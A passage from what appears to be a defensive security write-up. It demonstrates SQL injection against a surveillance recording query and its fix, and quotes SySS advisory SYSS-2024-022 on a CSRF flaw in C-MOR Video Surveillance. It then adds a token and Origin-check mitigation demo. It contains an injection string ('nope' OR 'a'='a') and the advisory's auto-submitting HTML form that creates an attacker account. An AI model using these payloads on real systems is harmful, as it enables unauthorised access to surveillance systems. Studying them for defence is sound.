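CAM_ID = re.compile(r"cam[0-9]{1,3}")


def list_movies_fixed(conn, cam: str, days: str) -> List[str]:
    if not CAM_ID.fullmatch(cam):
        raise ValueError(f"rejected cam parameter: {cam!r}")
    days_int = int(days)  # ValueError for anything that is not a plain integer
    return query_parameterized(conn, cam, days_int)


def demo() -> dict:
    """Run a benign request and a constructed injection through both variants."""
    injected_cam = "nope' OR 'a'='a"   # turns the WHERE clause into an always-true one
    conn = make_db()
    result = {
        "benign_vulnerable": list_movies_vulnerable(conn, "cam1", "1100"),
        "injected_vulnerable": list_movies_vulnerable(conn, injected_cam, "1100"),
        "injected_param_only": query_parameterized(conn, injected_cam, 1100),
        "benign_fixed": list_movies_fixed(conn, "cam1", "1100"),
    }
    for key, cam, days in (("injected_fixed", injected_cam, "1100"),
                           ("days_fixed", "cam1", "1100 OR 1=1")):
        try:
            list_movies_fixed(conn, cam, days)
            result[key] = "accepted"
        except ValueError:
            result[key] = "rejected"
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

<p>The vulnerable variant returns every recording for the injected value because the quote closes the string literal and the rest becomes SQL; the parameterized variant returns nothing for the same input, since no camera is literally named that. The advisory also notes the dump ran as database user "cam": a second, independent mitigation is to give that account only the SELECT rights the listing pages need, so an injection that does slip through cannot read or modify other tables.</p>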
<pre><code>Advisory ID: SYSS-2024-022<br />Product: C-MOR Video Surveillance<br />Manufacturer: za-internet GmbH<br />Affected Version(s): 5.2401, 6.00PL01<br />Tested Version(s): 5.2401, 6.00PL01<br />Vulnerability Type: Cross-Site Request Forgery (CWE-352)<br />Risk Level: Medium<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-05<br />Solution Date: -<br />Public Disclosure: 2024-09-04<br />CVE Reference: CVE-2024-45172<br />Authors of Advisory: Chris Beiter, Frederik Beimgraben,<br /> and Matthias Deeg<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The software product C-MOR is an IP video surveillance system.<br /><br />The manufacturer describes the product as follows:<br /><br />"With C-MOR video surveillance, it is possible to check your<br />surveillance over network and the Internet. You can access the live<br />view as well as previous recordings from any PC or mobile device.<br />C-MOR is managed and controlled over the C-MOR web interface.<br />IP settings, camera recording setup, user rights and so on are set<br />over the web without the installation of any software on the<br />client."[1]<br /><br />Due to missing protection mechanisms, the C-MOR web interface is<br />vulnerable to cross-site request forgery (CSRF) attacks.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The C-MOR web interface does not offer any protection against CSRF<br />attacks. 
These kinds of attacks force end users, or rather their web<br />browsers, to perform unwanted actions in a web application context in<br />which they are currently authenticated.<br /><br />CSRF attacks specifically target state-changing requests, for example in<br />order to enable or disable a feature, and not data theft, as an attacker<br />usually has no possibility to see the response of the forged request.<br /><br />In general, CSRF attacks are conducted with the help of the victim, for<br />example by a user visiting an attacker-controlled URL sent by e-mail in<br />their web browser. Often, CSRF attacks make use of cross-site scripting<br />attacks, but this is not mandatory.<br /><br />CSRF attacks can also be performed against a web application if a victim<br />merely visits an attacker-controlled web server. In this case, the<br />attacker-controlled web server is used to generate a specially crafted<br />HTTP request in the context of the user's web browser which is then sent<br />to the vulnerable target web application.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />The following HTML file containing a web form generates a simple<br />crafted HTTP POST request that creates a new user:<br /><br /><html><br /> <body onload="document.forms[0].submit()"><br /> <form action="https://<HOST>/dosetpassword.pml" method="POST"><br /> <input type="hidden" name="user" value="attacker" /><br /> <input type="hidden" name="user_fullname" value="Attacker" /><br /> <input type="hidden" name="pw1" value="password" /><br /> <input type="hidden" name="pw2" value="password" /><br /> </form><br /> </body><br /></html><br /><br /><br />When an authenticated C-MOR user with administrative privileges<br />visits a web server hosting this HTML file, a new attacker-controlled<br />user is created.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br 
/>Solution:<br /><br />There is no fix for this security issue.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-04-05: Vulnerability reported to manufacturer<br />2024-04-05: Manufacturer acknowledges receipt of security advisories<br />2024-04-08: Exchange regarding security updates and disclosure timeline<br />2024-05-08: Further exchange concerning security updates and disclosure<br /> timeline; public release of all security advisories<br /> scheduled for release of C-MOR Video Surveillance version 6<br />2024-05-10: Release of C-MOR software version 5.30 with security updates<br /> for some reported security issues<br />2024-07-19: E-mail to manufacturer concerning release date of C-MOR<br /> Video Surveillance version 6; response with planned<br /> release date of 2024-08-01<br />2024-07-30: E-mail from manufacturer with further information<br /> concerning security fixes<br />2024-07-31: Release of C-MOR software version 6.00PL1<br />2024-09-04: Public release of security advisory<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for C-MOR Video Surveillance<br /> https://www.c-mor.com/<br />[2] SySS Security Advisory SYSS-2024-022<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-022.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Chris Beiter and Frederik<br />Beimgraben.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. 
Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS Web<br />site.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
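<p>SYSS-2024-022 states the web interface has no CSRF protection at all, so the forged dosetpassword.pml form above succeeds purely because the victim's browser attaches the session cookie. The Python example below is added here and is not C-MOR code: it shows a synchronizer-token check plus an Origin header check on the server side, then replays the advisory's PoC form (fields user, user_fullname, pw1, pw2) against it with the victim's session but without a token. The session store, the token handling, the site origin and the user names are constructed.</p>

```python
"""Synchronizer-token CSRF protection for a state-changing POST (constructed demo)."""
import hmac
import secrets
from typing import Dict, Optional

SESSIONS: Dict[str, dict] = {}        # session cookie value -> session data
CREATED_USERS: Dict[str, str] = {}    # what a successful dosetpassword.pml creates
SITE_ORIGIN = "https://cmor.example"  # constructed origin of the web interface


def login(user: str) -> str:
    """Create a session and mint a per-session CSRF token. The token is only
    ever embedded in pages served from SITE_ORIGIN, which a page on another
    origin cannot read because of the same-origin policy."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def render_setpassword_form(sid: str) -> Dict[str, str]:
    """The fields the legitimate page embeds, including the hidden token.
    Returned as a dict rather than HTML to keep the demo testable."""
    return {"csrf": SESSIONS[sid]["csrf"],
            "user": "", "user_fullname": "", "pw1": "", "pw2": ""}


def handle_dosetpassword(sid: Optional[str], form: Dict[str, str],
                         origin: Optional[str]) -> int:
    """Return the HTTP status the server would answer with."""
    session = SESSIONS.get(sid or "")
    if session is None:
        return 401
    # Defence 1: browsers send an Origin header on cross-site POSTs; a value
    # that is not our own origin means the form was submitted from elsewhere.
    if origin is not None and origin != SITE_ORIGIN:
        return 403
    # Defence 2: the token in the form must equal the session's token.
    # Constant-time comparison so timing does not leak the token.
    token = form.get("csrf", "")
    if not hmac.compare_digest(token, session["csrf"]):
        return 403
    if not form.get("user") or form.get("pw1") != form.get("pw2"):
        return 400
    CREATED_USERS[form["user"]] = form.get("user_fullname", "")
    return 200


def demo() -> Dict[str, int]:
    """Replay the advisory's PoC form with and without the protections engaged."""
    sid = login("admin")  # the victim: an authenticated administrator
    # The PoC form as the victim's browser would submit it from an
    # attacker-controlled page: the session cookie rides along automatically,
    # but the page cannot know the token and the browser reports a foreign Origin.
    forged = {"user": "attacker", "user_fullname": "Attacker",
              "pw1": "password", "pw2": "password"}
    legit = render_setpassword_form(sid)
    legit.update({"user": "operator2", "user_fullname": "Second Operator",
                  "pw1": "constructed-pw", "pw2": "constructed-pw"})
    return {
        "forged_post": handle_dosetpassword(sid, forged, "https://attacker.example"),  # 403
        "forged_post_no_origin": handle_dosetpassword(sid, forged, None),             # 403
        "no_session": handle_dosetpassword(None, forged, None),                        # 401
        "legitimate_post": handle_dosetpassword(sid, legit, SITE_ORIGIN),              # 200
        "attacker_user_created": int("attacker" in CREATED_USERS),                     # 0
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

<p>The Origin check alone is not sufficient, since some clients omit the header, which is why the token check is the one that must never be skipped. Setting the session cookie with the SameSite attribute adds a third, browser-enforced layer: the cookie is then not attached to a top-level POST that originates from another site, so the forged request arrives unauthenticated in the first place.</p>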